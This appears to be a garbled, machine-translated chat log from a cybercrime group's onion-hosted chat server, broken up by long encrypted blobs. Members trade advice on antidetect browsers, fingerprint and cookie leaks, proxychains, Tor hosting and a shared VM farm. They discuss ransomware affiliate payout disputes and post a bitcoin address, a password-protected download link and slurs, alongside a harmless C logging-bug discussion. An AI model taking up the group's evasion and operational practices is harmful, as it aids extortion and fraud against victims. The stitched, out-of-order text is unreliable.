vab60uhhRvz2UAb39KtKyLWIzXoWq4JXkUjOEbQsoI1bitP5PW4AOMvH589zULgCxSIwiBeXchIx8Fj6Jt79lznW4UqnbwesCFsggylEqZI0Y/XWlu2Z3mBzhgIl1wranNONo7D1QVNhZAFDtnUGnTaeG1XQKQP8GWh+6NIsf2/BkZdmOW4BSp9WPN1UVEaOrblvsVpjlK3HBDdjPHDM2nMZoqSxA/KiGaCqP"}{"$binary":"FimaYoOV/avxE9eZKdV2CyYuqiu6U76eThc4WQZ9XRspT3+uOruvwtCuHxLGnLorTbmpJhat9bZk/syp1ZmCrFMqcwgbD8Gg1hqhKptjrK7KLgViSMsOeZm74J/fMJcOGlSuJMJ18vjR8FkdYjlXzDB8e8mOydLZ6nNu/ROJRxed2BOJuipheFrbhwaG4fYoz12zCW66Il0YCMJVauIniY="}{"$binary""X98ZwKBCfqD7+P6mZhyd1FSUHRl0xXf2MBxpUp9YlFnFfYnE6Hdbp6BZB/NfegouTKux19vIUxPIHEqzX+g2jTRhYLj49j1wJesPAB5Z6KpHEMAU/XDX+NkuZYTkrTlQOhrAXNZv/CfqceB/zdnoFsXcL3idE8wdYEO0e5y/OtX7L0M74UzBm2eHcwEAShePoe/DD0WfxB5lBEdYBKVfCD/ziVGI="}{"$binary""BhyYeie6gfjaciJboFTqCqMnNWW8TYK3BV4RQMGxnGZE79YmHCwvhZnZ7gNdOQtNy+08Nm+yScMZ7joT6t9CWuZ5Dq1yzjoYV4lvA5zH2PYTilRsfPbsZ9EGaEZDLcbvJ6RTlIzBeRmty7F/HzQtNrkROG8dpYWrxFdApkSLrWPjRzUJLd1E94XpgSCpHC6yC4+RFzW7HaJBZGMcIVvhjyDVgsmyfC9gkLgEy0LorCMeLRnKaScbSvKWlqp7e0+MLj9VSeNNjrHeJ4/HBrZ2bApSUnCx8laImc0lcodwcg=="}{"$binary":"BGhlF5xawGsRccWq4Y+ZJ0I7cHAyY7R/nWlDDN98wODuzOozu7Gjg277mqC+HxbE7Q/qehczkSTzSgTPgO60giJWUmbi+oS0h/y/J3iyKuqcSTVHH23tUO8qUZVkw99SeSHlilvTf1uOZLCM0jzb+H7D/fwcO3KEWqqwPK1r2/EOYv+EQYCkKlKhjxhMElz/Elrg6gb5mJT36p09aU6+pV0jy3eRRC6X"}{"$binary":"dT9hQWx8sXDRNnFK1ukoOaJAR+kxW8LEjlI+yagMIFBGHlFy+Rp9qYDNWr7PT/vog2RFrt2MSAB12CQXF2+PQn5ylKQROzqjNZxGV3A6mjG3zowroyEoIxIlC+Y2a2Ne3fwUfxld2P58lnFdRqizmqP+A12W3+klUX6EVG9KJr3ipqzzjxkUX4mRXc+qGu5qhdsxuiX8c02gbnys+qd9j7TUsGJb8el8T1xw2ITvIvhr9JBFWUdKduVIhUvfPmlAOX0="}{"$binary":"TvUllSwRGm8ssFTqqNJY32hZDm6NN/Jh60SzyW+4whzLJwjNaCN0pLAZYYDnR35VuiGTxpBi8zXMhLyf4oKwXblDjrcYLtAu3RXmlCRQhlzUVrAigTDoRsThfUFRPB6XffuGfigBD3xYVYA79bYLtwZEojGHIEN8QbTNK3KJFhjgO19aBuGROBxAhmBIyNPZGFgHpGIzTUVrPeKEB8zZefPQIjlFTDaake2zJ0qudHxntIs="}{"$binary":"ANowxdH4+Fs4beL5YVAJrQsBft2s3vN8l+uz2Q0qKZeBawCmL48X+O6GwqJ78XCTK860oynI7fxBL+eYbQ8B0uyObgHzCqF9vXT997TqKhk77sWT+4UjTSNK1zWXMKuvwHye7k6G6Xya8vFG2/b10XZMt1bnZt813A13dDM/p6MDZIbds5D3T69yiYikgAArHlevxBo+zidyafpgqvvNHrGutInjLldAm4ysLQ=="}{"$binary":"4750XJwReDo+a1ILUl4MdQSltZW2czUk3AypKn937zRHDTM3afHuNynWM2cMutbpCslbjqaQR/QZNyQ2l1GCUNgLT2cLu/84t8a6nfJ+VJ/5l9RnY5JfZsxUjuGxNMmpcPZMM9mStYb3Y72wtaoPDYRzfZZRFYy0P7Si7MY9b5+++lrIUyacjY0AygssFVT5aRtYffY7rheQRIpqlqd1Fbpb1KZPz3J1aso7qs1EgPn2JHT9O22S43wnOOihRioxvZP+CEhiL+2Y"}{"$binary":"Z2wSt1cSxCf+qDAZLm9JaXXf3cq1ysnNgU/k0kep/2gRVM8LfPjMuiODU8560sNTNUYWXRM7ypJJpHUjZHg1SzRTC6z/YhuWb++UMMhz3Mc4bNArFZAZRZzkeVPir8PIMLmQUtMMmhS5199xFy9nK/2lO9g2wiqAv71I+6nzK9qji60CaXuLdW19j2N1GehlIEqFhcBmMHIfwcyHAMULT/M3vAOcsxQNMbGrJqx6ZcfJBQQlQtTyhPlcgYWLPSupVWisY7uINs1yBGJUyeL2pRYDDqYQwIflMy+RIx2ZH+cKyJLtn/ESzkK6TC9oz8mD/kXbT4QHYNgnyVM0DNQVldA19P9ccpATrA1jh/n4eQRBhI1aZvm74pzwAaW7QrWncjU9Ma5Uep1mxor3I+9PdMjr4YtxrYuedhkL"}{"$binary":"++XWSeT4LV3GRI1rlhENQqPIHbIj/3hlflUtdysWosu0/0w+7JEmXUQhLz8RTJyQFYG9ztHBVPYKvHZlzv2oUmsjK+sYE2AUQ8i2heFVvSSME9jYBQssf9eXqT0VF0tqAXdjwvRQpWkAoUOpgT2tVzMYToCIUIYt2MGzJWnei6Npq6jXiaI2yPHhJHG+/gsTDI44bUoVPpVVktav55QppYToq7DYxwXwhMCejNFlfQ=="}{"$binary":"9K3UbpWrv5mU2e8HmD+UYLJnYGTxjpQ5AHO/fVHDvdXMU1cIzJQ3mRIQyrLHJhCJGCZ6l+edya0dFuzlL4wTUNysJNkOZDTeYwgyBxL5l9W2TOgpk0jG9Cv8V2B96UuoVxLK3qRzzY6ZNXFcZiOCqw4UQn9kWShpjQsUiQkOHSN+0ukGHJW/7scvTMMnjZ/cG+Bl8krJix3fICz0qQZ82EB5rANYXc+N4g=="}otrmaaaaaaaaaaaaaaanтак TEST_DIRS += ["jsapi-tests", "tests", "gdb"] in second case there is an outside condition, thank you or how is it that spaces are broken only at the beginning of the condition should not be python sensitive to the number of spaces? i.e. there is a condition inside of it, if you move the assignment with whitespace will it have any effect? i only know a little about python? yes i remember) ok, if anything knock if it appears, then you will need it not yet. man missing a schodan not needed in the end?I know the last v2. recently switched to v3. as usual by the law of meanness if you know write me too pliesparu months ago was alive, but I can not find tor3 link(( only the last link has@all verified alive? if anyone has the current forum address, do you have it? in your personal info if you know itAloha ! hello there ! It is controlled thermonuclear fusion. Soon they will sell it on Ali... A nuclear power plant is for what? It is a super nuclear power plant right out of china and a gay guy's ass from europe to warm what to do? boil water on it and overclock the turbines of generators...) the only thing left is to tame the sun, it is able to fly... of course it has too much energy and it maintains all this heat with some Chinese miracle... the main thing is not to trap the rest of the globe if something goes wrong)now what to do with it is left to be decided. for humane executions, we can use it already... hell, nothing, not even smoke@Garfield heh, this is the land of the rising sun - china, not japan `https://infosmi.net/society/276375-v-kitae-zapustili-iskusstvennoe-solntse/` 70 million degrees Celsius is a tantrum:sun_with_face:``he is not our demon ``demons, in a word``.
they say tsar, not the real one
```` won't let us sing such songs about the tsar ``who dared? who? there's already shielding all connections, like from a lead dome...better connection with the cosmos...one already zeroed in us everything is zeroed periodically, ways and scales only different "exceptions" seems to want to do a total reset...catch the bug !!!!i'm going to drink tea before it's acknowledged as a bug from above and fixed0nly until someone gets fucked up from outside that everything goes in a cycle, you'll be happy, you can live forever you can come up with 0day who will write a couple of dlls in kernels no time Don't break the world, it already has plenty of bugs...there's plenty to suggest, even here - we were trained to think that time flows only in the way we can understand it without catching a "blue screen". time is also a part of matrix, if it comes to that, and about this module I have thought up there will be no collective mind - there is such a notion, like up to the last buckupadak there will be a rollback so its memory should be scattered over other "modules"... on all, Mr. Smith succeeded in that other matrix, but something went wrong to understand how at that to save another memory) yesterday I was reviewing the film "Mandela effect", though not for the first time and here I really came to the idea yesterday If we all live in a matrix, from time to time we upload updates and synchronize. really can reset the system to factory settings) full download) Estonian piiiiinggg me roskomnadhor slowedTe he wrote 55 minutes ago. and you just came? why did you say about the rocket, it immediately fell here ``Now they will beat him, maybe even kick him`` ))), `I, dear, you will be injured now...``Then Dima will come angry and say: and that's it, Rocket is dead, we break the counter messages malfunctioned? post with a dog edited, missed first (Weldon, Angie) Eng not you)) I can not avoid quoting the phrase "work, and Vona pratsue.I'm ready to listen to you his whole biography...I thought he put it all down, but he's not...Comrades, we're talking here, but it's all down there! @Garfield - "I don't think, I dream. There's no harm in dreaming. Then I'm not doing anything harmful." :grin:A profound thought, but so empty...reading Cat, something reminded of Down House )`No, I do not like pills. I choke on them. I'm more into fish farming. So I don't need drugs at all. I see life as picturesque without them. I have a reference too. The president clown had even sharper catchphrases than the mayor boxer) And today not everyone can look into tomorrow. Or rather, not only everyone can watch, few can do itKot I do not understand your speech :woozy_face:In the original, bye kat, bye lena.Trolling from the street we are just being sociable :pleading_face:bye kai. Bye Lena, there's only one Troll)You're like two Troll brothers )we're like trolls at a time by the wayIf Kai hadn't joined the chat I would have known that "The Snow Queen" story would've started off that way:
Story One. The Mirror and its Shards
Trolls Carrying a Mirror.... by Gerda)Hi @kai !kai "Button, Button" is how the title was framed by the author. Sounds different even - from elation to despair movie "premise", the story "button, button" )) you can even review, probably. at the time it seemed quite at the levelIn fact, awesome! I need to review DMB, the world movie) as gophers in the steppes :grin:Everywhere and!yep, you can not see it, but it is there)) all the time)) the big brother is watching here too)) keep working, I'm watching)) yes everything already, toad the fuck you work for me )))) and fuck it then, work so everyone who is online at this time, i can't get into the network except you or just wait for a breakthrough)) i sometimes have no connection because of a wpn, no rebooting helps, but i switch to another config and it works, i can't get into the network in any way, the wpn works for everyone or only for me?:man_facepalming:TAM NOT ME? If you do not need it - roll back vm)@all Call back, whose vm on the farm WIN-EBG5OFV6S4Q (Windows 10 Server x64) ?Thanks ask adam of course[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=wTPminvHdTfvaJRWq) and I get the git?I'm there waiting for the wrong chat room, have you already given me the rocket lag...(I somehow only launched it for the third time) git works fine? Sooner or later the voting around the world will move to online. This opinion was expressed in an exclusive interview with RT by Dmitry Medvedev, deputy chairman of the Russian Security Council and chairman of the United Russia party. Commenting on the topic of interference in the elections, he noted that "digital giants are fed up with everyone, including the United States," and said that *Russia should have tools to influence foreign digital platforms.* Medvedev also answered a question about political competition in Russia and said what he thinks about Trump blocking the leadership of Western social networks.
return Trump ?)well shit...)(picture with a sly nigger.jpg)to read mail! dudes, think about it, why would someone start a mail service? polichinelle secret).sorry, forgot the source, proton - hanypot anb....you can jerk off at the end of the day...fuck, you can drink...it's cold...the weather sucks...why is everyone so sour?! @kermit thanks native @angelo``` in Russian.
https://www.securitylab.ru/news/524997.php
?@kventin ?I think it's martin@all Folks, we have a cool web designer. What's his nickname? I think they're trying to be divisive.
They act like typical ru affiliates. what affiliates with traffic shaving, what affiliates with lockers "shaving" and the ability to cut 70%) in my opinion it's a split attempt, given the very large payments do not think that they have problems with money to shit in their karmamozhet is internal rats and not the revilacher policy se rats maybe so they merged and nowhere to complain, so was not it is unclear, i.e. ends in water.i.e. ends in water )[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=duYqtiJTKPtDoqhGh) as far as I know, they deleted these threads when they were banned on the forums but they were not charged for payments and found a backdoor, I do not understand, are they accused of real cases of non-payment, which is fixed on the forum, or found a backdoor that allowed to do so?How can you tell the essence of it in three words? I heard that Lockbit did not pay out to anybody there.
https://threatpost.com/revil-affiliates-leadership-cheated-ransom-payments/174972/
``kek@all
```
https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/
``laterdayprivet not yet btz workkosh bc1qjy9v4kuuj6n80r0gtqsdp4eva0aye279k278mf the password to the archive itself grdFDHL:":kv report:
Download: https://qaz.im/load/BEAGNr/yH9E4K
Delete: https://qaz.im/index.php?a=delete&q=832830891
Password: E6hndDieSn6iy7BAfsN3HBiz9K4AfDRNy34BsaG8rBfK I ran out of work bitsgood morning )She calms me down )It's not even Friday, and you're already on the Linda?) mom, mom, marijuana, you better not touch it without it! )ok, put the crutch to smoke is definitely harmful)in the 21st century vinda made fixing application windows on top of others ? or should i put a crutch ?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=mSz8psrWXs2dssFwJ) thank yous@all the toad is up and the toad got scared of tox competition and came to life and look where go your vicitpette under root call netstat -lpt under root see it? netstat on what interface listening port shows? https://golangcode.com/serve-static-assets-using-the-mux-router/там all convenient and nice and in general write via mux look on what ip hangsblexknid help
anybody lift the site in torus on go?
`package main
import (
    "fmt"
    "net/http"
)
func index(w http.ResponseWriter, r *http.Request) {
    http.ServeFile(w, r, "onion/index.html")
}
func main() {
    fmt.Println("Server is listening ...")
    http.HandleFunc("/", index)
    http.ListenAndServe(":8001", nil)
}`
this all works, but the tor browser can't see it
Knock on the toad (in the profile), plzaga, the toad has wings attached) then they will say Angelo pizdyajaye, then calm down, everyone has a toad fallen ?welcome backgeraldoHi all. I'm back.=(kvetininthat's what chaotic sex leads to(((rocket has frequent disconnectionsrepetition - the mother of learning - the toad has fallen offno he asked me out,i confirmed yesterday he was.It's been 3 weeks....He must have been on vacation,for 2 weeks i think he was going toWho knows where @elroy is now ?By the way,you can set different sounds for each room or turn them off. - very handy@brainwalkerscommon:laughing:thank you@ allen
without a spaceHello all. How do I specify specifically who the message is for? (Example: `need to call red` by angelo at 9:59 AM)so it fails because there is encryption. and it does not work correctly with another time-browser does fail on the time mismatch, but it is solvable..I checked from the background)I thought this feature too old thanks Bennyvotes and answer, Proxifier can be used in the eternal trial, date/time change here rolled ..) my internal pirate won) suggest an analogue of Proxifier for winduf, need to "proxy" prog that do not have their own properties to change the type of connection? like proxychains, but for the winnda ... guys who has monero kosh on the winnda?chromium now is not the best there is such an asshole, of course, all clean check, yes:fingers_crossed:you will do fine, we believe in you only femalevote as I will do antik - will work through the pisu:grinthis is clearada everything works through the asshole like everywhere else in generalfree dolphin there are constant crashes, you need a new antivirus, cracked variant does not work there glues everywheredolhin anty a normal antivirus to 5 profiles for freealuchis easier to take aws and raise wireguard one line in the blacklistaghad a hole in his friends that they downloaded from torent, and there dick, check it there all poblocheny, uzuchit only for cuz what so yesseed4 is not a vpn, and shlaksmenil vpn and norm, seed4/me weirdlane now I figured out not solving the problem, but was sure and checked everything was clean before changing vpn (do not understand your problem, why not try this?head from antikA if it constantly asks for cookies when you enter the same site, it means they are erased?Makin, just open a private window and work there) VELDOOON) kicking Veldon that he rather finished antic) sat sieden on the North and it was all good news, the questionantidetect browsers seem to solve, but they cost money on the services themselves google - you spalat at any on cookies that I do not know as with this now, it should be verifiedtipa it even invented and the background here is not so after that, with about a month or two ago google put a big face on it and said it was tired of tracking us and refuses to cross-site cookies in chrome in the FF they used to block cross-site cookiesGhostster plugin also dumbass.through these scripts are leaking and tracking - google knows your movements over the network thoroughly, due to the scale of the coverage of the owners of sites convenientproblem is that google analytics scripts on almost every site, especially cookies googlyne nizkom through the settings, the browser is able to resist it, and yes understand.to. no one had any idea that they were being trackedwhich is the reason they were forced to warn all the users you do not mind?you get a big window - we're collecting cookies here now remember - when you're surfing the net, on every new site i'll introduce you, on my work computer, i only have work, i never use personal addresses) it's probably you who's changing your address) and you've been penciling on it google knows that you now have another address) the session cookie went to google - you're not in private mode, right?went back to google again changed the sessional cookie and it every time you open any google service (including any google-analytics site and 99% of such sites) knows that you're it google knows that you're it you went to your google mail you've got the usual ff mode lookfingerprint it blocks, but the cookie does not )@angelo put the sphere you'll understand everything i have the ff settings on Kastom where it blocks all cookies fingerprint, etc.etc.kanvas cache favicon - everything stays private mode disables leakage through cookies, but not through everything else prints, so the answer - in the first place the leakage is through cookies
the second is webrtc
canvas
cache, etag
safebrowsing
faviconim precisely for this windowa if you work in private mode, then all the cookies set by the sites as if forgottenyou go to any, and google is sent cross-browser cookies - I all pootrubal through the config
it does not help google sprays its cookies like a fucking fauncuke there is a global in vindex localstoredge your cookies are sent that all? i disabled all through the config who else does so? well cookies are sent in normal)) but on another vpn all was clean) well you give me )normal you work in private mode or normal? for the browser work you need some antique
multilogin, sphere, etc. for fuck's sake, I just turned on another wpn, the browser did not change anything private window, do you know how to turn on the fucking cookies? there is also a leak through the cache all clear and google sends me in search ip-usa what?it does not help ip-address leak? just changed the wpn and shit leak happened not that alone ffda i shut everything down in the ffbrowser what? webrtc after changing the wpn from the browser? dnc
What's the leak on Googol? @all
Friends who still use the old VM farm to work, the connection has changed, the credits, write to me in ls. "Cool history "Well, this is understandable, but it is too expensive to argueKo me recently drove up in a car, they showed my ID and offered to go, when asked where, said to be witness to the next house, they say something happened
I said I was in a hurry, I thought it would not work, but they were not digging deeper and I went home).

But at first I was tense) There are no regulatory federal documents about masks. There are only resolutions of mayors and governors, without stamps together with signatures. They apply only to workers and employees of the authorities, and are advisory in nature. In short, they are taking the piss out of people.(c) ))))))))) told me not to argue anymore (in general, I somehow got away with it they were like - no, that the pointer, the arrow, and the smoking place 500m away is oooooooo over there, your documents fit, I said what's the deal, I'm in a smoking area - I don't give a shit, they see a sign saying 'smoking area', for some reason it's right next to the entrance to the station - and they're like, two years ago I opened a coke shop near my doorway - and they did a gayorrhoi there... they radioed for a garbage truck and i sat there for three hours, then i walked home: and several times I've seen situations - lying in the ass, a blue homeless guy - just passing by They already had a law against smoking in public places I was once in Bryansk, about a year ago, and there I thought I needed a cigarette and I'll show off too)) you guys are scary people) well, you'd better go and tell them to fuck off rather than go to the station all day, I once got caught also on administrative charges. but a friend wanted to flaunt knowledge of the law, we were released at 12:30 a.m. and he was detained at dinner time and he was sitting there with a mask on his mouth, I took his picture and wrote in the report that he also put it on, he said it was ok with his mouth shut, then I asked him for some documents that say there are rules for wearing a mask, they were not found, so who else got caught in the system this week?I had cops look at my phone the other day)
On my statement that it is illegal, they said, that, they say, do you want to lose half a day in the department?) Just do not flinch, or they will take a 19.3) you do not play with you wife saw how one young man straight in a five-storey grabbed)The cop himself was without PPE. Info 100ka) Yeah, you come with a huge / wide pipe pridu a completely different person) well, they just teyabtsirovat) On YouTube, there are videos where these comrades go to hell and go further, such as a fine will not know, will the court@thomas there had to send this friend and say that he went to buy a mask@thomas You paid the fine?I went to kindergarten - they don't let me in without a mask, and take my temperature) just yesterday they were joking about vaccination, and that it was all bullshit) today a fellow policeman fined me for going without a mask in a public place) and made all sorts of protocols for another half day) Hi, everybody. How many of you have dealt with neural networks in terms of creating, training, calculating the grid, the amount of data to be trained, data training, etc.?i'm a survivor here how is it not like you, guys are quiet here, i'll take a look, thank you. it's really the difference between the sky and the earth2K cost it has a lot more reflection coefficient, but the viewing angle is lousy, the screen is reflective, i can not do it imho i have a 100" tv projector only without the sun, I think how to increase the brightness or blinds to take@patrick you know, I once wanted to build a CNC machine tool on the arduino, and realized that I would rather Kermit cum than sit and do it, although the desire remains@angelo `https://habr.com/ru/company/ruvds/blog/645897/`
i can give you some money to buy some methanol, i need some methanol, i need some pills, i need some dough, i need some pills, i need some methanol, i need some pills, i need some pills, i need some pills, i need some pills, i need some methanol, i need some dough, i need some pills...he's got money for methane he needs money for sport and kurst...I think you're whistling about booze I'll give up the bottles and I can live a month@angelo malt - spin, earn money Fanz would not have chosen such a carpet he had a red carpet and someone knows he's a 60k pusher, it's too early to get it, we all know him by sight but he was not in those gb videos?better tell me where Franz and the coins are after Stalin's death, it would have been a mess. if something had happened, Franz would have said funny))) Angelo is a secretary now) good. dad is not going anywhere. everything is normal with him Franz wrote that he is still on vacation for his business, but he was not missing him. I don't know when he'll show up... You're Khrushchev... Asians, and whales in particular, have chauvinism on a cosmic scale... Lavrov did not get it, but you did?) once spoke in English with a Chinese, they understood each other... There are different legends about it... The thing is that they usually have no respect for English, or pretend not to... They do not know English.

They teach them badly there, as one chinese man said, "You're not my brother, you're not a brother, you bastard"? Everyone understood him perfectly and really fucked him up One of the Russians already talked on the bus in Moscowbadeok the other day, I do not understand "too Russians", except for foul language))))) You'd think we always understand each other)) Huh, I have two students there, their words are not my native language, they speak everything normal in Mandarin..elroy, well, yes in their language) ... The thing is that as a rule, they do not respect and do not know English ... or pretend that they do not know them, they often do not understand their own from other provinces. But in writing, I'll probably forgive them...In their language, you mean?) And suddenly, brothers, there are those who can correspond with the Chinese without "google-translate"? Last year...I'm about to bring sacks of gold, but what about our salary? And have a productive week! ;)Merry Monday to all you guys !@weldon look how would the crime report deanon not arrange)
https://www.youtube.com/watch?v=nhVs22Fkakw
Berkova actually recently debuted in pop manu Don't get too carried away with salts, preferably c2h5oh + pickles))) old-school))
i told you - the neighbor above me lived (not for a long time), bought a house and shagool from the balcony to this theme... i got fucked up with questions and i don't even know what his name was...i haven't watched the others with her)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=3MpxMfirugwqosAqB) with men in movies?) Berkova has many fights, but the opponents are fucking flawed. what kind of fight is that?eyJhbGciOiJBh70utwDgdcirQzdu5mmc9spxDqbxQWwFTTtQcGfDiHOtW0QxuA3TVA3LcGbagEtxZpaKO6Ky18bnutDL+7y+elHJA4Aa0jNVgzlzGelY+OqhMtr2C4Ua2eCIZRQN1kk4HqSTB++EDMjbQ1l17K9jRfi1TPbmpqWxdFaf8sIbtUjUxYk+hheJPm5YoY6xHqvAeyJhbGciOiJBXFZcRB/8zVvaIiA/seIcn6sv/SeWHwOdhzUyI2qqgzZyh2bSFKRq2n/16S2XbqSwogx6gxVmCPClf9z444CdkwXjAaet04KsZQhNHiN902+dYSw9qg9woDzTJOBO+/PDHtmFaiX9Q62pFOlUoEi2NB5HTH32tToXGQyabPkBMPnjOnt8/bg0ss3LxXYWv9Yytmc1/DaNkyv5RsdbXVnbzA7WQjSMKp72SmiOsHj9BcAfuY6XPOnuUCiKvogelgOT79Fj35Iyt1OeN53ap4G3c+MgmZ+k5Amzs6RLBNz+yz87wWTo7qbZhHhUE101NV2PeJruEs1F/6kSEQB6c/v2uosNpxyF7dv9AJUcAne4jLg6V88BmyNbuaOQLlW8mNYAt1j2/heI3uonbxUGoW7Fp7PVZKt50mXOQNwVA1qj2PKOA5JnLIz8NXyCIXLl9wg0WhAoAHb+8Lugay6TW8RjUpcH6txvIEAdIhtIC772bL+Y6CcA3McFhxjnoYWgL9l9SBhu2tm5P+ge2LmCPgUXeLUlJTKRiScN7e/UFs0ZdVPx0GaQedyU1+O7EemysYqD3fJpFpPzrlkKX8ieTQHT9mutvAbn5ufZxayAvcqdj4RFYxTMY9vJVj3Q6yt+w2d1EMwBzFWEijZr6+xRtjQKvnngzVeRXlRcT/A05zdnmMpF8NiZv/NqkjvrgfN8TZAMeyJhbGciOiJBg6EqV35f2OSjATnvbB2FTrt961VhPYd39s9xI65ab9cIiKTdpBJEWKlcXutpdPHXJHKC2Q410luVq1PqeFxQZDJynjfT it's the fault of the wine. I have a MAC laptop came up. So on the MAC all is normal, and the wine 99% stable. do not remember, somehow it is even called) the last couple of years, almost all laptops are not charged when fully charged, but now it does not matter if the network cable is connected to the notebook or not, when acum is already charged to 100 ? Tam controllers are so ?
Maybe you leaked to the americans?
```
So one of his colleagues leaked Nikulin to the americans. Yes, the court confirmed that he was charged with treasonSachkov himself was arrested for two monthsMaybe he leaked to the americans? He wanted to take care of problems so he could go to America. It's not clear why, for ties with the AmerksenSiloviki searches Group-IB. The company's management may be detained `https://rtvi.com/news/gendirektor-group-ib-zaderzhan-po-podozreniyu-v-gosizmene/``What a поворот*eyJhbGciOiJBonhebC9Fh2kUHJVTS4vBTJJ45E5ZHrVX0NdYbD/xDFcjVy3zIG1Z61QzQTqiihTvb/nMZjLp6+pi4t+I40D4pDxUQu/CxwT6HOE66vo/RBIzPDD5ia4/9uWoGQk1H2ZzMfL3U5uFX0GdnVO0CgPJxC+8h8q2IeRRjTnDv7Gct6fuOeSLVojpB0JqWW528niGeyJhbGciOiJB02FHGE5fmnB4ytjlskaGuoaqIPFTIW/m+bC5cJ04C7j7dh/EZzJNELoSrHYiwTf6WHa74BfzReK/tieVe1POm5+Uj+bOV+PF4Fq1BY6DZCbeYIQHNXH6ic8NJwM6KaEQ0wGapO6qWlhnKgCpFdKY7KXuIGdfrDwJ4ZDtztzfCNYzvI9at+95N5BgxXAtXd8N0XhoLvQ9+NTjUqdaxXTFxnmNkc00g+ulIemkt7DBhQZyYHui7cHPhJqOHlt6RDJVfXIz+mDq2Fsy171XVUKLbzlN3rTCwReg3nRma4jG2BXdavydOLA1l7+lgrM0eyxNSkY4sJOrQynno8JdVptpDiAXwLJM6TH51yG6D07FXVXqcAKCRrp8L//o0Vnx+ohk92t0kbow9Myrg1vcTzxZIaGYYZgzhFBETqGstSAAJpj+iQt5HDS0jm0vEMUCp9F88Mk7l9RJPzzBUkcQhLW6dPEnEDZApW75ZqqMiotP/keDoipRM0LEUW5qMLv1Bx02GmWsEUnAgdUcqXyP8Xq4gs+u7nDz0qUkHOcJ1GcRxNZjYkK7O4XN+KgUHiuSewhTnltOMUsyIiEjyF3+DWMcRA==eyJhbGciOiJBIGryuFgWIB4hX+1aVKQPEK1993O/oTTheDEYThdKlr90P1KIbFkNy3/dGp7I3I2R+TSNMux8LPh/Xh2WszZTMtihaOJ03lTn8xtaLC9gp0/XbggBHxj+7iQ+yRGX8OAT+1UnHGva/g/gQpOUnN3laKtw7ImTKHMV1ypyltLIYAg=а maybe you there already make the chat magical #golovastbIEHave talked about work for a long time in the work chat.))
I know you programmers! They start with their zeros and ones with gits and then end up with pornNowadays they are good, they think about work))) You scare people more times but they delete their posts)))) To remind me there are no workers here, it's a typical programmer's chat about life...I dare say, Uncle @elroy already mentioned that we don't discuss working stuff in *general* window and git in onion, really, I do all such moves through proxychains, and there is a chainWaitForSingleObject with timeout to unavailable resource, etc.Sorry, citizens, but how sekuronno fluff from your ip, or even through the vpn? senks gais! In gitlab can be the main branch of the main, and locally - the master. Need to correct.git remote add origin <url> yes, created through git iinitproject already created in git? Gentlemen, tell me, I want to transfer a local project (folders and files) in gitlab, how easy to do it, not in the same file / document to fill ...?! Under ms I compile everything to be /W4 /WX
but I only disable
#pragma warning(disable:4214)
#pragma warning(disable:4201)
#pragma warning(disable:4207)
otherwise there is no wayVS as far as I know and creates projects with W3 by default this is ideal)even on type conversion there is noW3 and not a single warning usually is brought to this or how treat warning as error directive lookszb if code is built without warnings with -W3 by the way, it is wrong)_CRT_SECURE_NO_WARNINGS I put in every project all the sameAnd I don't really give a shit, and which took in C11this way in msvc there are some additions, the same functions that have the postfix "_s "htu closer to it so msvc is not an indicator, when it comes to standard crtKey point - likely. Again, there is nothing like that in MSVC.
Internally, the function retrieves arguments from the list identified by arg as if va_arg was used on it, and thus the state of arg is likely altered by the call.

Guys, it is described in the documentation as "c/c++" paths are inscrutable :)While I've been using similar logging code on the Windows for more than 10 years. The funny thing is that I've been writing this code for a couple of months and it didn't even occur to me.
In the debug there was logging on the screen.
In the release it was logging to a file.
And in general everything was working fine.
But here I ran the release with additional logging on the screen and it started crashing randomly. yes, va_start writes for va_list a pointer in the stack to the parameter that comes right after format
but vfprintf, when it fetches data from the stack, it also changes values in va_list to the next one after each fetch, so log_write(char* format, ...)
{
	va_list args;

	va_start(args, format);
	vfprintf(stdout, format, args);
	va_end(args);

	va_start(args, format);
	vfprintf(_log_file, format, args);
	va_end(args);

}
Looks like va_...... has some internal static pointer which is initiated in va_start so if it %s - it will crash (although depends on stack) and at %u - just left numbers.i.e. after first use va_list points a bit further than last parameter. Then there is already garbage there.
If we take trash as a number, there's no problem. But if it's a pointer to a string, then it'll be addressed to the wrong address or the zero-terminal string affects it somehow), but trash is written to file.
 log_write("a=%u b=%u c=%s\n", a, b, c)
doesn't cause a crash any moreIt's pretty trivial. The problem is with va_list, or rather in functions that use it. In this case, if you use vprintf and vsprintf, there will be no difference too.
The whole point is that MSVC's v*printf function does not change va_list. Also other (but not all) compilers don't change either. But gcc does not save values when used.
So after the first vfprintf the data in va_list no longer has the correct pointer. And re-use will cause crash. You can even make _log_file = stderr;
If `_log_file = fopen("/tmp/test.log", "a+");` to disable it, will it make the same difference?I understand, but if a, b or d somehow become negative, your output will be gibberdano in this example %i %d %u is like nothing at all.Well, when it comes to 32/64 bits it is clear that there may be problems. When you shove 64 bits, and counted 32.then puzzled over why then had to change to unsigned long, and when logging forgot to make correctionsa it's clear, it just happened that the original data type was intunsigned long: %lu.Just I remember paparak))) the difference was when using long or unsigned long do not remember) well, it's not like it matters. you can also replace it with %i, there will be no difference in this case%u for unsigned integers with sign %d because@gelmut, why does your int output with %u? i.e. it is a trivial logging to screen + duplication in fileFor the whole day to look for an error in the code. Everything turned out to be trivial and strange at the same time.  Part of the logging code was ported from Windows (ms compiler) to Linux (gcc). Everything works fine on Windows, but not on Linux. This is the first time I've encountered something like this in 15 years.
This is a mental exercise. What will this program print on the screen? And why does it do that?
```
#include <stdio.h>
#include <stdarg.h>

FILE* _log_file = NULL;


void log_write(char* format, ...)
{
    va_list args;

    va_start(args, format);

    vfprintf(stdout, format, args);
    vfprintf(_log_file, format, args);

    va_end(args);
}

int main()
{
    int a = 1;
    int b = 2;
    char* c = "3";
    int d = 4;
    
    _log_file = fopen("/tmp/test.log", "a+");

    log_write("a=%u b=%u c=%s d=%u\n", a, b, c, d);

    return 0;
}
